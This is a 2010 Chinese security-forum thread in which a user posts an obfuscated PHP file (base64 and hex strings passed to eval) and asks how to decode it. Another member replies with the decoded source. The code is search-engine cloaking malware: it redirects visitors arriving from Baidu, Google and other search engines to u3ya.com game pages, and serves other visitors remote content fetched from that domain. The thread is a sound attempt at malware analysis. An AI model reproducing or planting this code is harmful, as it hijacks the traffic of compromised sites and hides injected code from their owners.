瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » php解密
drycool - 2010-10-16 19:12:00
<?php
eval (base64_decode('ZnVuY3Rpb24gaGV4MmJpbigkZGF0YSl7DQoJJG5ld2RhdGE9IiI7DQoJJGxlbiA9IHN0cmxlbigkZGF0YSk7DQoJZm9yKCRpPTA7JGkgPCAkbGVuOyRpKz0yKXsNCgkJJG5ld2RhdGEuPXBhY2soIkMiLGhleGRlYyhzdWJzdHIoJGRhdGEsJGksMikpKTsNCgl9DQoJcmV0dXJuICRuZXdkYXRhOw0KfQ=='));
eval (hex2bin('6572726F725F7265706F7274696E6728455F4552524F52293B0D0A6865616465722822636F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D67623233313222293B0D0A2473737971203D20206578706C6F646528277C272C2762616964752E636F6D2F733F7C676F6F676C652E636F6D2E686B2F7365617263683F7C736F676F752E636F6D2F736F676F757C736F676F752E636F6D2F7765627C736F736F2E636F6D2F713F773D27293B0D0A2473737A74203D20303B0D0A246C61696C75203D20245F5345525645525B27485454505F52454645524552275D3B0D0A666F722824623D303B24623C3D636F756E74282473737971292D313B24622B2B297B0D0A20202069662865726567692824737379715B24625D2C246C61696C7529297B0D0A2020202020202473737A74203D20313B0D0A202020202020627265616B3B0D0A2020207D0D0A7D0D0A6966282473737A74203D3D2031290D0A7B0D0A20202020202020202467657431203D20245F4745545B27766965776E657773275D3B0D0A2020202020202020247461677331203D207375627374722824676574312C2731272C73747272706F732824676574312C222F22292D31293B0D0A2020202020202020696628247461677331203D3D2027646827290D0A2020202020202020246C69737431203D2027687474703A2F2F64682E753379612E636F6D2F642F6572726F722E68746D273B0D0A2020202020202020656C7365696628247461677331203D3D202761696F6E27290D0A2020202020202020246C69737431203D2027687474703A2F2F61696F6E2E753379612E636F6D2F612F6572726F722E68746D273B0D0A2020202020202020656C7365696628247461677331203D3D2027727827290D0A2020202020202020246C69737431203D2027687474703A2F2F72786A682E753379612E636F6D2F722F6572726F722E68746D273B0D0A2020202020202020656C7365696628247461677331203D3D2027647427290D0A2020202020202020246C69737431203D2027687474703A2F2F64682E753379612E636F6D2F64742F6572726F722E68746D273B0D0A2020202020202020656C7365696628247461677331203D3D2027646D27290D0A2020202020202020246C69737431203D2027687474703A2F2F646D6C712E753379612E636F6D2F646D2F6572726F722E68746D273B0D0A2020202020202020656C7365696628247461677331203D3D2027746C27290D0A2020202020202020246C69737431203D2027687474703A2F2F746C62622E753379612E636F6D2F742F6572726F722E68746D273B0D0A0948656164657228224C6F636174696F6E3A222E246C697374312E223F222E245F5345525645525B275345525645525F4E414D45275D293B0D0A7D0D0A656C73650D0A6865616465722822636F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D67623233313222293B0D0A24676574203D2027273B0D0A24676574203D20245F4745545B27766965776E657773275D3B0D0A2474616773203D2073756273747228246765742C2731272C73747272706F7328246765742C222F22292D31293B0D0A6966282474616773203D3D2027646827290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F64682F696E6465782E706870273B0D0A656C73656966282474616773203D3D202761696F6E27290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F61696F6E2F696E6465782E706870273B0D0A656C73656966282474616773203D3D2027727827290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F72786A682F696E6465782E706870273B0D0A656C73656966282474616773203D3D2027647427290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F647477732F696E6465782E706870273B0D0A656C73656966282474616773203D3D2027646D27290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F646D6C712F696E6465782E706870273B0D0A656C73656966282474616773203D3D2027746C27290D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F746C62622F696E6465782E706870273B0D0A656C73650D0A246C697374203D2027687474703A2F2F6A69656B6F752E753379612E636F6D2F6A6B2F64682F696E6465782E706870273B0D0A66756E6374696F6E207265616475726C282475726C290D0A7B0D0A2472657370203D204066696C655F6765745F636F6E74656E7473282475726C293B0D0A0972657475726E2024726573703B0D0A7D0D0A0D0A2464617461746D70203D207265616475726C28246C6973742E273F272E24676574293B0D0A6563686F202464617461746D703B'));
?>




之前有一个类似的文件,但是一直不知道第二部怎么解密,也就是(hex2bin 这一部分怎么解密,请高手指点!


用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.519.0 Safari/534.7
哥们郁闷啊 - 2010-10-16 19:19:00
看不懂~~~~~~~~~~~
是昔流芳 - 2010-10-17 7:04:00


[复制到剪贴板]
CODE:
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
$ssyq =  explode('|','baidu.com/s?|google.com.hk/search?|sogou.com/sogou|sogou.com/web|soso.com/q?w=');
$sszt = 0;
$lailu = $_SERVER['HTTP_REFERER'];
for($b=0;$b<=count($ssyq)-1;$b++){
  if(eregi($ssyq[$b],$lailu)){
      $sszt = 1;
      break;
  }
}
if($sszt == 1)
{
        $get1 = $_GET['viewnews'];
        $tags1 = substr($get1,'1',strrpos($get1,"/")-1);
        if($tags1 == 'dh')
        $list1 = 'http://dh.u3ya.com/d/error.htm';
        elseif($tags1 == 'aion')
        $list1 = 'http://aion.u3ya.com/a/error.htm';
        elseif($tags1 == 'rx')
        $list1 = 'http://rxjh.u3ya.com/r/error.htm';
        elseif($tags1 == 'dt')
        $list1 = 'http://dh.u3ya.com/dt/error.htm';
        elseif($tags1 == 'dm')
        $list1 = 'http://dmlq.u3ya.com/dm/error.htm';
        elseif($tags1 == 'tl')
        $list1 = 'http://tlbb.u3ya.com/t/error.htm';
    Header("Location:".$list1."?".$_SERVER['SERVER_NAME']);
}
else
header("content-Type: text/html; charset=gb2312");
$get = '';
$get = $_GET['viewnews'];
$tags = substr($get,'1',strrpos($get,"/")-1);
if($tags == 'dh')
$list = 'http://jiekou.u3ya.com/jk/dh/index.php';
elseif($tags == 'aion')
$list = 'http://jiekou.u3ya.com/jk/aion/index.php';
elseif($tags == 'rx')
$list = 'http://jiekou.u3ya.com/jk/rxjh/index.php';
elseif($tags == 'dt')
$list = 'http://jiekou.u3ya.com/jk/dtws/index.php';
elseif($tags == 'dm')
$list = 'http://jiekou.u3ya.com/jk/dmlq/index.php';
elseif($tags == 'tl')
$list = 'http://jiekou.u3ya.com/jk/tlbb/index.php';
else
$list = 'http://jiekou.u3ya.com/jk/dh/index.php';
function readurl($url)
{
$resp = @file_get_contents($url);
    return $resp;
}

$datatmp = readurl($list.'?'.$get);
echo $datatmp;


1
查看完整版本: php解密
© 2000 - 2024 Rising Corp. Ltd.